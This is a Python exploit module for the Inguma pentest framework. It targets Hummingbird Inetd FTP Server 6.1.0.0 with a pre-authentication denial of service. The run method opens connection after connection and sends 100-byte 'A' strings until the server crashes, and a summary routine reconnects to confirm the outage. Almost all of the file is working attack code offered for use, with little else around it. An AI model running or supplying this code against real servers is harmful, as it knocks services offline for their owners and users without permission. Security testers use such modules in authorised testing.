#!/usr/bin/python

#
# FTP server (Hummingbird Communications Ltd. (HCLFTPD) Version 6.1.0.0) Preauth Remote Denial of Service
#
# Copyright (c) 2006, 2007 Joxean Koret
#

import sys
import time
import socket

from lib.libexploit import CIngumaModule

name = "ftpdwdos"
brief_description = "Hummingbird FTPD 6.1.0.0 preauth remote DOS"
type = "exploit"
affects = ["Hummingbird Inetd FTP Server 6.1.0.0"]
description = """
Hummingbird Inetd FTP Server 6.1.0.0 is vulnerable to a remote preauthentication denial of service 
vulnerability which allows the program to be crashed. It have been tested only under a very old 
version of it but new versions may be vulnerables as well.
"""
patch = "No patch know"
category = "dos"
discoverer = "Joxean Koret <joxeankoret@yahoo.es>"
author = "Joxean Koret <joxeankoret@yahoo.es>"

class CFtpdDwDos610(CIngumaModule):

    target = ""
    waitTime = 0
    timeout = 1
    exploitType = 2
    wizard = False
    services = {}
    results = {}

    def run(self):

        target = self.target
        port    = self.port

        print "[+] Launching attack against %s:%d ..." % (target, port)
        i = 0
        while 1:
            socket.setdefaulttimeout(self.timeout)
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            try:
                s.connect((target, port))
                s.send("A"*100)
                i = 1
                time.sleep(self.waitTime)
            except:
                if i > 0:
                    print "[+] Exploit works:", sys.exc_info()[1][1]
                    print "[+] Done"
                    
                    return True
                else:
                    print "[!] Error.",sys.exc_info()[1]
                    return False

    def printSummary(self):
        try:
            if self.results is None:
                return

            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.connect((self.target, self.port))
            
            print "Exploit doesn't work :("
        except:
            print "Received exception:",sys.exc_info()[1]
            print "Exploit works }:->"
        
        print 
